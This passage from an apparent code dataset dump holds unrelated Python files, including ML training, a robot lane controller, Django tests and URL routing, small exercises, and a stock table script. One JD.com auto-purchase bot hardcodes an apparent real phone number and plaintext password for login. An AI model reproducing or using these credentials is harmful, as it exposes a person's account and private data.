2018-08-20\n添加私教教练的可预约时间\n'''\nfrom pageObject.coach_worktime_object import CoachWorkTime\nfrom selenium.webdriver.support.ui import Select\nimport time\n\nclass AddCoachWorkTime:\n\n def __init__(self):\n print(\"add AddCoachWorkTime\")\n\n @staticmethod\n def add_coach_worktime(driver):\n addcoachworktime =CoachWorkTime(driver)\n driver.implicitly_wait(30)\n\n # 左侧菜单栏:课程\n addcoachworktime.go_course_table_obj().click()\n # time.sleep(2)\n\n # 切换至私教教练工作时间设置table\n addcoachworktime.go_private_coach_setting_obj().click()\n # time.sleep(2)\n\n # 选择私教教练\n Select(addcoachworktime.coach_select_obj()).select_by_visible_text(\"测试教练不要删除\")\n\n # 点击可预约时间按钮\n addcoachworktime.add_worktime_obj().click()\n # time.sleep(2)\n\n # 添加可预约时间\n addcoachworktime.time_from_obj().send_keys(\"22:30\")\n addcoachworktime.time_to_obj().send_keys(\"23:30\")\n\n # 确认\n addcoachworktime.save_button_obj().click()\n # time.sleep(2)\n\n # 弹框确认\n addcoachworktime.confirm_button_obj().click()\n # time.sleep(2)","sub_path":"appModules/add_coach_worktime.py","file_name":"add_coach_worktime.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"11348779","text":"from datamaestro import prepare_dataset\nimport torch\nimport torchvision\nimport torchvision.datasets as dataset\nmnist_trainset = dataset.MNIST(root='./data', train=True, download=False)\nfrom matplotlib import pyplot as plt\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nds = prepare_dataset(\"com.lecun.mnist\")\ntrain_images, train_labels = ds.files[\"train/images\"].data(), ds.files[\"train/labels\"].data()\ntest_images, test_labels = ds.files[\"test/images\"].data(), ds.files[\"test/labels\"].data()\n\nclass MonDataset(torch.utils.data.Dataset):\n def __init__(self,set_data,set_labels):\n self.datos = torch.tensor(set_data)\n self.label = torch.tensor(set_labels)\n\n def __getitem__(self,index):\n aux = self.datos[index]\n aux = aux.float() / 255\n aux = aux.view(aux.shape[0]*aux.shape[1])\n return(aux,self.label[index].view(1))\n\n def __len__(self):\n return(len(self.datos))\n\nmon_dataset = MonDataset(train_images[0:3000],train_labels[0:3000])\nprint(mon_dataset[1][0].shape[0])\n\n##\n\n# from torch.utils.tensorboard import SummaryWriter\n# import numpy as np\n# writer = SummaryWriter(\"runs/TME8AMAL\")\n# for i in range(10):\n# x = fc_layer1.fc1.weight\n# writer.add_histogram('distribution centers', x, i)\n# writer.close()\n\n##\n\nfc_layer = torch.nn.Sequential(OrderedDict([\n(\"fc1\",torch.nn.Linear(mon_dataset[1][0].shape[0], 100)),\n(\"relu1\",torch.nn.ReLU()),\n(\"fc2\",torch.nn.Linear(100,100)),\n(\"relu2\",torch.nn.ReLU()),\n(\"fc3\",torch.nn.Linear(100,100)),\n(\"relu3\",torch.nn.ReLU()),\n(\"clas\",torch.nn.Linear(100,10)),\n]))\n\n# class FC_Layer(torch.nn.Module):\n# def __init__(self):\n# super().__init__()\n# self.fc1 = torch.nn.Linear(mon_dataset[1][0].shape[0], 100)\n# self.fc2 = torch.nn.Linear(100,100)\n# self.fc3 = torch.nn.Linear(100,100)\n# self.clas = torch.nn.Linear(100,10)\n# self.relu = torch.nn.ReLU()\n# self.dropout = torch.nn.Dropout(0.2)\n#\n# def forward(self,x):\n# y = self.fc1(x)\n# y = self.relu(y)\n# y = self.dropout(y)\n# y = self.fc2(y)\n# y = self.relu(y)\n# y = self.dropout(y)\n# y = self.fc3(y)\n# y = self.relu(y)\n# y = self.dropout(y)\n# y = self.clas(y)\n# return(y)\n#\n# fc_layer = FC_Layer()\n\nd_batch = 300\nnb_epoch = 1000\n\nloss_fn = torch.nn.CrossEntropyLoss()\n\nl_r = 1e-3\noptim = torch.optim.Adam(fc_layer.parameters(),lr=l_r)\n\nhist_list = np.linspace(0,1000,10,dtype=int)\n\nwriter = SummaryWriter(\"runs/TME8AMAL\")\nj = 0\n\n\nfor epoch in range(nb_epoch):\n data = torch.utils.data.DataLoader(mon_dataset, shuffle = True, batch_size = d_batch)\n loss_aux = []\n for x,y in data:\n y_pred = fc_layer(x)\n loss = loss_fn(y_pred,y.long().view(d_batch))\n loss_aux += [loss.item()]\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n\n writer.add_scalar(\"loss l_r %s\" %(l_r), np.mean(loss_aux), epoch)\n\n if epoch in hist_list:\n writer.add_histogram('fc1', fc_layer.fc1.weight, j)\n writer.add_histogram('fc2', fc_layer.fc2.weight, j)\n writer.add_histogram('fc3', fc_layer.fc3.weight, j)\n writer.add_histogram('clas', fc_layer.clas.weight, j)\n j += 1\n\n if epoch%50 == 0:\n print(\"Epoch number:\",epoch,\"with error\",np.mean(loss_aux))\n\n\nwriter.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"TME8/TME8.py","file_name":"TME8.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162209163","text":"#!/usr/bin/env python3\n\nimport os\nimport rospy\nfrom duckietown.dtros import DTROS, NodeType, TopicType\nfrom std_msgs.msg import String, Bool\nfrom duckietown_msgs.msg import Twist2DStamped, WheelsCmdStamped, LanePose\nimport numpy as np\nimport time\n\nclass ControllerNode(DTROS):\n\n def __init__(self,node_name):\n # Initialize the DTROS parent class\n super(ControllerNode, self).__init__(node_name=node_name,node_type=NodeType.PERCEPTION)\n\n #Publisher\n #Publishes actuator commands to node handling the wheel commands\n self.pub_car_cmd = rospy.Publisher(\"~cmd\", WheelsCmdStamped, queue_size=1, dt_topic_type=TopicType.CONTROL)\n #self.pub_car_cmd = rospy.Publisher(\"fakebot/car_cmd_switch_node/cmd\", Twist2DStamped, queue_size=1, dt_topic_type=TopicType.CONTROL)\n\n #Subscriber\n #Subscribes to the node publishing the LanePose estimation\n self.sub_lane_reading = rospy.Subscriber(\"~pose\", LanePose, self.control, \"lane_filter\", queue_size=1)\n #self.sub_lane_reading = rospy.Subscriber(\"fakebot/lane_filter_node/lane_pose\", LanePose, self.control, \"lane_filter\", queue_size=1)\n\n #shutdown procedure\n rospy.on_shutdown(self.custom_shutdown)\n\n #sys params\n self.omega_old = 0.0 \n self.dist = 0.0 #class variable to store distance do lanecenter\n self.dold = 0.0 #stores error from previous timestep for derivative term\n self.phi = 0.0 #class variable to store current estimate of heading\n\n #params used for PID control \n self.C_i = 0.0 #class variable, to store integralstate\n\n #loading params from yaml file\n\n #self.baseline = 0.1 #distance between the two wheels\n self.baseline = rospy.get_param('~baseline', None) #distance between the two wheels\n\n #weighting parameters should chosen such that weight_d + weight_phi = 1\n #and weight_d/weight_phi < pi/(2*d_max), where d_max should approx be the lanewidth*safetycoefficient (i.e. 1.2*lanewidth)\n self.weight_d = rospy.get_param('~weight_d', None)\n self.weight_phi = rospy.get_param('~weight_phi', None)\n\n #parameters for PID controller\n self.k_p = rospy.get_param(\"~k_p\",None)\n self.k_i = rospy.get_param(\"~k_i\",None)\n self.k_d = rospy.get_param(\"~k_d\",None)\n #saturation parameters\n self.sati = rospy.get_param(\"~sati\",None)\n self.satd = rospy.get_param(\"~satd\",None)\n self.omegasat = rospy.get_param(\"~omegasat\",None)\n\n #self.vref = rospy.get_param(\"~vref\",None) #v_ref defines speed at which the robot moves \n self.vref = float(os.environ['SPEED'])\n\n\n #function to reset Integralstate, if robot is thought to be perfectly in Lane (d=phi=0)\n def resetintegral(self,d,phi):\n tol_d = 0.05\n tol_phi = 0.1\n\n if np.abs(d) <= tol_d and np.abs(phi) <= tol_phi:\n self.C_i = 0\n rospy.loginfo(\"Reset Integral\")\n\n #returns true, if robot moves towards lanecenter and False otherwise\n def drivetocenter(self,d,phi):\n if d<0 and phi>0:\n return True\n elif d>0 and phi<0:\n return True\n else:\n return False\n\n #compute velocityboost based on distance to lanecenter\n def computespeed(self,d):\n speedfactor = 2.0\n return speedfactor*np.abs(d)\n\n #compute controlaction based on lanepose estimate\n def getcontrolaction(self,dist,phi,dt):\n \n #compute error for PID\n err = self.weight_d*dist+self.weight_phi*phi\n\n #proportional gain part\n C_p = self.k_p*err\n\n #integral term (approximate integral)\n self.C_i += self.k_i*dt*err\n\n #activate if integralreset is desired:\n #sets integralterm C_i to zero if d and theta are zero, thus the DB is driving perfectly in lane\n #self.resetintegral(dist,tist)\n\n #integral saturation\n #make sure integral term doesnt become too big\n if self.C_i > self.sati:\n self.C_i = self.sati \n if self.C_i < -self.sati:\n self.C_i = -self.sati \n \n #derivative term (usually not used, because noise makes it rather unstable)\n C_d = self.k_d*(err-self.dold)/dt\n self.dold = err\n \n #derivative saturation\n #make sure derivative term doesnt become too big\n if C_d > self.satd:\n C_d = self.satd\n if C_d < -self.satd:\n C_d = -self.satd\n \n #computing control output\n omega = C_p + self.C_i + C_d\n \n #output saturation \n #making sure, that too large of actuator output is requested, \n #since a) the real life motors cannot achieve any arbitrary speed \n #and b) too big of omega could make the robot crash, since there is a delay in the measurements\n if omega>self.omegasat:\n omega=self.omegasat\n if omega<-self.omegasat:\n omega=-self.omegasat\n\n #uncomment the following part to allow change in velocity based on distance to lane center and\n #heading direction (heading towards lane center -> drive faster, heading away -> drive slower)\n #if robot is almost perfectly in lane -> drive faster \n '''\n if np.abs(omega) < 0.05 and np.abs(self.omega_old) < 0.05:\n v = 0.3\n elif self.drivetocenter(dist,tist):\n v = vref + self.computespeed(dist)\n else:\n v = vref - self.computespeed(dist)\n \n self.omega_old = omega\n '''\n\n v = self.vref\n return v,omega\n\n def run(self):\n # publish message every 1/x second\n rate = rospy.Rate(10) \n car_cmd_msg = WheelsCmdStamped()\n #car_cmd_msg = Twist2DStamped()\n tnew = time.time()\n stoptime = 28.0\n t0 = time.time()\n i=0\n\n parammsg1 = [self.k_p,self.k_i,self.k_d]\n rospy.loginfo(\"[kp,ki,kd] = %s\" % parammsg1)\n \n while not rospy.is_shutdown():\n #computing dt for I-part of controller\n told = tnew\n tnew = time.time()\n dt = tnew-told\n \n '''\n #stop programm once a certain time has passed (for experiments, not meant for normal usage)\n if tnew-t0>stoptime:\n rospy.logwarn(\"Time's up!!!\")\n rospy.signal_shutdown(\"Ende gut, alles gut\")\n self.custom_shutdown()\n '''\n \n v,omega = self.getcontrolaction(self.dist,self.phi,dt)\n\n #car_cmd_msg.omega = self.omega\n #car_cmd_msg.v = self.vref\n\n #console output, if requested actuatoroutput saturates\n if np.abs(omega) >= self.omegasat:\n rospy.logwarn(\"Max Omega reached\")\n\n #def. motor commands that will be published\n car_cmd_msg.header.stamp = rospy.get_rostime()\n car_cmd_msg.vel_left = v - 0.5*self.baseline * omega\n car_cmd_msg.vel_right = v + 0.5*self.baseline * omega\n #publish actuator output to wheels_driver_node\n self.pub_car_cmd.publish(car_cmd_msg)\n\n #printing messages to verify that program is working correctly \n #i.ei if dist and tist are always zero, then there is probably no data from the lan_pose\n message1 = self.dist\n message2 = omega\n message3 = self.phi\n message4 = v\n\n #rospy.loginfo('d: %s' % message1)\n #rospy.loginfo('omega: %s' % message2)\n #rospy.loginfo('phi: %s' % message3)\n rospy.loginfo('v: %s' % message4)\n #rospy.loginfo(\"time: %s\" % message5)\n \n rate.sleep()\n\n #shutdown procedure, stopping motor movement etc.\n def custom_shutdown(self):\n stop_msg = WheelsCmdStamped()\n stop_msg.header.stamp = rospy.get_rostime()\n stop_msg.vel_left = 0.0\n stop_msg.vel_right = 0.0\n\n self.pub_car_cmd.publish(stop_msg)\n rospy.sleep(0.5)\n rospy.loginfo(\"Shutdown complete oder?????\")\n\n #function updates pose variables, that camera gives us data at higher rate then this code operates at,\n #thus we do not use all incoming data\n def control(self,pose, source):\n self.dist = pose.d \n self.phi = pose.phi \n\n delay = rospy.Time.now() - pose.header.stamp\n delay_float = delay.secs + float(delay.nsecs)/1e9 \n rospy.loginfo('delay [s] = %s' % delay_float) \n\nif __name__ == \"__main__\":\n # Initialize the node\n #rospy.loginfo(\"Hello from the start\")\n\n lane_controller_node = ControllerNode(node_name='lane_controller_node')\n\n lane_controller_node.run()\n # Keep it spinning\n rospy.spin()","sub_path":"packages/my_package/src/weightedPID.py","file_name":"weightedPID.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567311363","text":"from django.test import TestCase\nfrom clientes.models import Empresa, Informativo\nfrom django.contrib.auth.models import User\n\ndef mockup_empresa():\n usuario = User.objects.create_user(username=\"mock\",email=\"test@mock.com.br\",password=\"123123\") \n empresa_mock = Empresa(nome_empresa=\"Empresa Teste\",cnpj=\"34.534.534/5345-34\",\n insc_estadual=\"34.534.534-5\",rua=\"Rua dos Mocks\",\n complemento=\"n 350 10 andar sala 1000\",cep=\"24.654-780\",\n cidade=\"Pinhais\",uf=\"RS\",usuario=usuario)\n empresa_mock.save()\n return empresa_mock\n\ndef mockup_informativo(empresa):\n informativo = Informativo(assunto='Promoção do Mes',mensagem='Contratando nossos serviços de RH até o dia 30, você recebe um desconto de 30% até a proxima renovação. Aproveite!',\n eh_pendencia=False,visualizado=False)\n informativo.save()\n informativo.empresas.add(empresa)\n informativo.save()\n return informativo\n\n\nclass EmpresaTestCase(TestCase):\n\n def test_verificar_se_empresa_esta_salvando_corretamente(self):\n empresa = mockup_empresa()\n self.assertIsNot(empresa.id,None)\n\n def test_obter_endereco_completo(self):\n empresa = mockup_empresa()\n endereco_esperado = \"Rua dos Mocks n 350 10 andar sala 1000 / Pinhais-RS Cep: 24.654-780\"\n self.assertEqual(endereco_esperado,empresa.endereco_completo)\n \n def test_obter_informacao_quando_nao_ha_telefone_cadastrado(self):\n empresa = mockup_empresa()\n mensagem_esperada = \"Nenhum telefone informado.\"\n\n self.assertEqual(mensagem_esperada,empresa.telefones_contato)\n \n def test_excluir_informativos_quando_excluir_a_ultima_empresa_relacionada(self):\n empresa = mockup_empresa()\n informativo = mockup_informativo(empresa)\n self.assertQuerysetEqual([],Informativo.obter_todos(empresas_is_null=True))\n \n empresa.deletar_empresa()\n Informativo.deletar_informativos_sem_empresas()\n self.assertQuerysetEqual([],Informativo.objects.all())\n\nclass InformativoTestCase(TestCase):\n \n def test_verificar_se_informativo_esta_salvando_corretament(self):\n empresa = mockup_empresa()\n informe = mockup_informativo(empresa)\n self.assertIsNot(informe.id, None)\n\n\n","sub_path":"clientes/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"206340829","text":"\"\"\"\nLatihan Encapsulation ini akan menggunakan Sistem Level dan Experience\njadi ketika hero1 menyerang maka experience akan nambah dan levelnya akan naik begitupun sebaliknya\n\"\"\"\n\n\nclass Hero:\n # private class variabel\n __jumlah = 0\n\n def __init__(self, name, health, attPower, armor):\n self.__name = name\n self.__healthStandar = health\n self.__attPowerStandar = attPower\n self.__armorStandar = armor\n self.__level = 1\n self.__exp = 0\n\n self.__heatlhMax = self.__healthStandar * self.__level\n self.__attPower = self.__attPowerStandar * self.__level\n self.__armor = self.__armorStandar * self.__level\n\n self.__health = self.__heatlhMax\n\n Hero.__jumlah += 1\n\n @property\n def info(self):\n return \"{} level {} : \\n\\thealth = {}/{} \\n\\tattack = {} \\n\\tarmor = {}\".format(self.__name, self.__level,\n self.__health,\n self.__heatlhMax,\n self.__attPower,\n self.__armor)\n\n @property\n def gainExp(self):\n pass\n\n @gainExp.setter\n def gainExp(self, addExp):\n self.__exp += addExp\n if self.__exp >= 100:\n print(self.__name, 'level up')\n self.__level += 1\n self.__exp -= 100\n\n self.__heatlhMax = self.__healthStandar * self.__level\n self.__attPower = self.__attPowerStandar * self.__level\n self.__armor = self.__armorStandar * self.__level\n\n def attack(self, musuh):\n self.gainExp = 299\n\n\nslandar = Hero('slandar', 100, 5, 10)\naxe = Hero('axe', 100, 5, 10)\nprint(slandar.info)\n\nslandar.attack(axe)\nslandar.attack(axe)\nslandar.attack(axe)\nslandar.attack(axe)\nprint(slandar.info)\n","sub_path":"latihan_encapsulation.py","file_name":"latihan_encapsulation.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"286899215","text":"class Solution:\n \"\"\"\n @param n: count lucky numbers from 1 ~ n\n @return: the numbers of lucky number\n \"\"\"\n def luckyNumber(self, n):\n # Write your code here\n if n < 8:\n return 0\n d = len(str(n)) - 1\n a = [0, 1]\n for i in xrange(2, d + 1):\n a.append(a[-1] * 9 + 10**(i - 1))\n\n p = 10**d\n m = n / p\n if m == 8:\n return m * a[d] + (n % p) + 1\n elif m > 8:\n return (m - 1) * a[d] + p + self.luckyNumber(n % p)\n else:\n return m * a[d] + self.luckyNumber(n % p)\n","sub_path":"Contest 30 Quarter #1/1385. Lucky Number Eight/alex.py","file_name":"alex.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233219866","text":"from splinter import Browser\nfrom selenium import webdriver\nfrom datetime import datetime, timedelta\nimport time\nimport argparse\n\n\n\n\nPRICE = \"\"\nb=Browser('chrome')\n\n#b=webdriver.Chrome() \ndef endStep():\n nprice = PRICE\n while nprice == PRICE:\n b.reload()\n nprice = b.find_by_id('needPayPrice').value\n print (\"%s-->current price:%s\" % (datetime.datetime.now().strftime(\"%H:%M:%S.%f\"), nprice))\n print (\"submit order.....\")\n b.find_by_id('submit').click()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Simulate to login Jing Dong, and buy sepecified good')\n parser.add_argument('-d', '--bday', \n help='buy day', default='')\n parser.add_argument('-t', '--btime', \n help='buy time', default='0')\n# \n# \n options = parser.parse_args()\n print( options)\n buyd=options.bday\n buyt=options.btime\n \n# buyh=int(options.bhour)\n# buym=int(options.bminute)\n# buyh=24\n# buym=15\n# if buym==0:\n# bbm=59\n# bbh=buyh-1\n# else:\n# bbm=buym-1\n# bbh=buyh\n# \n # for test\n print (\"start.....\")\n# \n t3=datetime.strptime(buyd+' '+buyt,'%Y-%m-%d %H:%M:%S')\n #t3=datetime.strptime('2017-03-02 00:00:00','%Y-%m-%d %H:%M:%S')\n #b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://cart.jd.com/order/orderInfoMain.html')\n #b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://item.jd.com/4325034.html')\n b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://item.jd.com/4390094.html')\n uu=b.find_link_by_text('账户登录')\n uu.click()\n b.fill('loginname','18371542519')\n# b.fill('loginname','18371542519')\n b.fill('nloginpwd','Super123!')\n b.find_by_id('loginsubmit').click()\n #b.visit('https://item.jd.com/3763103.html')\n tt=datetime.now()\n tttt= t3-tt\n ttt= tttt.days*24*60*60+tttt.seconds\n while (ttt>-60*15):\n\n tt=datetime.now()\n tttt=t3-tt\n \n ttt= tttt.days*24*60*60+tttt.seconds\n print ('timespan:%d'%ttt) \n if(ttt>60*20 ):\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 15')\n time.sleep(60*15)\n b.reload\n #print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 15')\n continue\n else:\n if (ttt>=60*2):\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 1')\n time.sleep(60)\n \n continue\n else: \n if(ttt<60*2 and ttt>=7):\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'sleep 1 second')\n time.sleep(1)\n \n continue\n else: \n if(ttt<7 and ttt >-60*15):\n #qg =b.find_by_id('choose-btn-ko')\n tryb = b.find_by_id('tryBtn')\n lentry=tryb.__len__()\n if lentry != 1:\n print('reload')\n b.reload()\n \n if lentry ==1:\n print('try buy ')\n tryb.click()\n \n b.find_by_id('saveConsigneeTitleDiv').click()\n b.find_by_id('order-submit').click()\n continue\n qg =b.find_by_id('choose-btn-ko')\n ttttt= qg.__len__()\n print('ttttt %d'%ttttt)\n if ttttt==1:\n qbhtml=qg.first.outer_html\n enable=qbhtml.find('btn-disable')\n print('enable %d %s'%(enable, qbhtml))\n if enable ==-1:\n print('buy')\n qg.click()\n b.find_by_id('saveConsigneeTitleDiv').click()\n b.find_by_id('order-submit').click()\n \n \n \n\n\n ","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"628336873","text":"\"\"\"qstack URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom registration.backends.simple.views import RegistrationView\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom django.views.generic import TemplateView\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\n\n # If possible convert all into for [get and post] class based views\n\n #############################################################\n\n # A Feauture for All [CR Views]\n\n url(r'^add/', 'cab.views.add', name='add'),\n\n # Index config\n\n url(r'^$', 'cab.views.index', name='index'),\n\n\n\n # To be Deprecated Slag to be established to For Limited Swags\n\n url(r'^delete/(?P[0-9]+)/$', 'cab.views.delete', name='delete'),\n url(r'^edit/(?P[0-9]+)/$', 'cab.views.edit', name='edit'),\n\n # For all [[[ Most Important View ]]]\n\n url(r'^question/(?P[0-9]+)/$',\n 'cab.views.detail_view', name='detail_view'),\n\n # For a Particular User\n\n url(r'^delete_a/(?P[0-9]+)/$',\n 'cab.views.delete_answer', name='delete_answer'),\n url(r'^edit_a/(?P[0-9]+)/$',\n 'cab.views.edit_answer', name='edit_answer'),\n\n\n\n #####################################################\n\n\n # Seperate view into another app and check functionality\n\n url(\n r'^register/$',\n RegistrationView.as_view(form_class=RegistrationFormUniqueEmail),\n name='registration_register',\n ),\n\n url(r'', include('registration.backends.simple.urls')),\n\n\n ######################################################\n\n # Bookmarking (i.e Favoriting Views)\n url(r'^favs/', 'cab.views.user_bookmarks', name='cab_user_bookmarks'),\n url(r'^add_fav/(?P\\d+)/$',\n 'cab.views.add_bookmark', name='cab_bookmark_add'),\n url(r'^delete_fav/(?P\\d+)/$',\n 'cab.views.delete_bookmark', name='cab_bookmark_delete'),\n\n\n\n # Rating Views\n\n url(r'^(?P\\d+)/rate/$',\n 'cab.views.rate_snippet', name='cab_answer_rate'),\n\n\n # support\n url(r'^support/$', 'cab.views.support', name='support'),\n\n\n url(r'^uquestions/$', 'cab.views.uquestions', name='uquestions'),\n url(r'^uanswers/$', 'cab.views.uanswers', name='uanswers'),\n\n url(r'^d3mapper/$', 'cab.views.d3mapper', name='d3mapper'),\n url(r'^search/$', 'cab.views.search', name='search'),\n\n\n # Accounts\n\n url(r'', include('django.contrib.auth.urls')),\n\n url(r'^markdown/', TemplateView.as_view(template_name=\"markdown.html\"))\n\n\n # Internal Server Error Pages Not Found Pages Set DEBUG = TRUE\n\n\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"qstack/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"121090737","text":"def load_test_data(data_dir, sz, rescale = 1):\n from PIL import Image\n import os\n import numpy as np\n from tqdm import tqdm\n\n num_images = len(os.listdir(data_dir))\n print(\"{} images found\".format(num_images))\n file_name = []\n x_test = np.empty((num_images, sz,sz,3), dtype=np.float32)\n\n c = 0\n for f in tqdm(os.listdir(data_dir)):\n img = Image.open(os.path.join(data_dir, f))\n img = img.convert(mode = \"RGB\")\n x_test[c,...] = img.resize((sz,sz))\n file_name.append(f)\n c += 1\n\n return x_test * rescale, file_name","sub_path":"load_test_seedling.py","file_name":"load_test_seedling.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"417204353","text":"\"\"\"\n Eric Zorn 1/8/2018 Stock Earnings Summary: ICT 4370 Winter 2018 Module 2\n\n In this project, I was able to build two different tables with prefilled user data. I was able to store all of the information\n into the appropriate variables as lists of information. I then was able to gain user input for the person's name. I then performed\n the logic of earnings or losses and built a new list with those given values by using the Python append() function.\n\n I imported a library known as texttable to build the first formatted table of information and have also built a custom table beneath it.\n I used a proper header with the name value and the format() functions for appending all of these values to a string of text.\n\n Attached to this submission as well is a table that is built completely off of user input. I wanted to give it a try with functions in Python.\n\n\"\"\"\n\n# Import Text Table Module/Library\nimport texttable\n\n# Set\ntable = texttable.Texttable()\n\n# Pre-defined variables of stock information\nname = input(\"What is your full name? \")\n\ntitles = [\"Stock Symbol\", \"NO Shares\", \"Purchase Price\", \"Current Value\", \"Earnings/Losses\"]\nstock_symbols = [\"GOOGL\", \"MSFT\", \"RDS-A\", \"AIG\", \"FB\"]\nnumber_shares = [125, 85, 400, 235, 150]\npurchase_prices = [772.88, 56.60, 49.58, 54.21, 124.31]\ncurrent_prices = [941.53, 73.04, 55.74, 65.27, 172.45]\nearns_losses = []\n\nfull_list = []\n\n\n# The formula is (Shares own * current price) - (shares own * bought price)\nearn_loss_one = (number_shares[0] * current_prices[0]) - (number_shares[0] * purchase_prices[0])\nearns_loss_two = (number_shares[1] * current_prices[1]) - (number_shares[1] * purchase_prices[1])\nearns_loss_three = (number_shares[2] * current_prices[2]) - (number_shares[2] * purchase_prices[2])\nearns_loss_four = (number_shares[3] * current_prices[3]) - (number_shares[3] * purchase_prices[3])\nearns_loss_five = (number_shares[4] * current_prices[4]) - (number_shares[4] * purchase_prices[4])\nearns_losses.append(earn_loss_one)\nearns_losses.append(earns_loss_two)\nearns_losses.append(earns_loss_three)\nearns_losses.append(earns_loss_four)\nearns_losses.append(earns_loss_five)\n\n\n# Append and Print Nested List to full_list variable\nfull_list.append(titles)\nfull_list.append(stock_symbols)\nfull_list.append(number_shares)\nfull_list.append(purchase_prices)\nfull_list.append(current_prices)\nfull_list.append(earns_losses)\n\n# print(full_list)\n\n# Check for Floating Point Number Function\ndef isFloat(string):\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n# Check to see if Name Variable is an Integer or a Float. If so, program will exit\nif name.isdigit() or isFloat(name):\n exit()\n\n\n# Create Table as long as all data is True and the correct data type\nprint(\"\\n\\n\\n\")\nprint(\"Stock Table Info for {0} (TextTable Library)\".format(name.upper()))\nprint(\"---------------------------------------\")\nheader = titles\ntable.header(header)\nrow = [stock_symbols[0], number_shares[0], purchase_prices[0], current_prices[0], earns_losses[0]]\ntable.add_row(row)\nrow = [stock_symbols[1], number_shares[1], purchase_prices[1], current_prices[1], earns_losses[1]]\ntable.add_row(row)\nrow = [stock_symbols[2], number_shares[2], purchase_prices[2], current_prices[2], earns_losses[2]]\ntable.add_row(row)\nrow = [stock_symbols[3], number_shares[3], purchase_prices[3], current_prices[3], earns_losses[3]]\ntable.add_row(row)\nrow = [stock_symbols[4], number_shares[4], purchase_prices[4], current_prices[4], earns_losses[4]]\ntable.add_row(row)\n\n\n# Draw the Table\ndraw_table = table.draw()\nprint(draw_table)\n\n\n\n\nprint(\"\\n\\n\\n\")\nprint(\"Stock Table Info for {0} (Custom Table)\".format(name.upper()))\nprint(\"---------------------------------------\")\nprint(\"{0} | {1} | {2} | {3} | {4}\".format(titles[0], titles[1], titles[2], titles[3], titles[4]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[0], number_shares[0], purchase_prices[0], current_prices[0], earns_losses[0]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[1], number_shares[1], purchase_prices[1], current_prices[1], earns_losses[1]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[2], number_shares[2], purchase_prices[2], current_prices[2], earns_losses[2]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[3], number_shares[3], purchase_prices[3], current_prices[3], earns_losses[3]))\nprint(\"{0} | {1} | {2} | {3} | ${4}\".format(stock_symbols[4], number_shares[4], purchase_prices[4], current_prices[4], earns_losses[4]))","sub_path":"Module 2/Homework/preGen.py","file_name":"preGen.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"385925043","text":"import sys\r\n\r\nimport requests\r\nimport urllib\r\nimport time\r\n\r\ndef printA(s):\r\n sys.stdout.write(s + '\\n')\r\n\r\ndef getCidAndTitle(bvid, p=1):\r\n url = 'https://api.bilibili.com/x/web-interface/view?bvid=' + bvid\r\n data = requests.get(url).json()['data']\r\n title = data['title']\r\n cid = data['pages'][p - 1]['cid']\r\n return str(cid), title\r\n\r\n\r\ndef getInformation(bvList):\r\n infoList = []\r\n for bvid in bvList:\r\n item = []\r\n bvid = bvid[-12:]\r\n if len(bvid) == 12:\r\n cid, title = getCidAndTitle(bvid)\r\n item.append(bvid)\r\n else:\r\n assert len(bvid) 